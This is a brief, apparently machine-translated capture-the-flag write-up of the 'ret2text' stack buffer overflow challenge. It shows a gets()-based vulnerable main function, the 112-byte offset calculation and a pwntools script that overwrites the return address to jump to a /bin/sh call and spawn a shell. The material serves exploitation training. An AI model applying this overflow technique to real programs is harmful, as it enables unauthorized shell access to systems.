Verbatim https://www.dazhuanlan.com/2019/08/25/5d622cf80cbe3/
View basic information about the process
Opened NX, representing the data on the stack is not executable
Look at the running processes
Process only one input point, the process will drag ida
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [esp+1Ch] [ebp-64h]
setvbuf(stdout, 0, 2, 0);
setvbuf(_bss_start, 0, 1, 0);
puts("There is something amazing here, do you know anything?");
gets(&s);
printf("Maybe I will tell you next time !");
return 0;
}
Saw the return address gets no input function limitations, we then calculate the process gets function
You can see the address is 0x62616164, calculate the number of bytes we need to fill the following
112 garbage characters to be filled
Next we see if / bin / sh in the ida
Presence / bin / sh at the address 0x0804863A
Then write a shell script
from pwn import *
p = process("./ret2text")
p.recvuntil('anything?n')
p.sendline('a'*112+p32(0x0804863A))
p.interactive()
Successfully obtained permission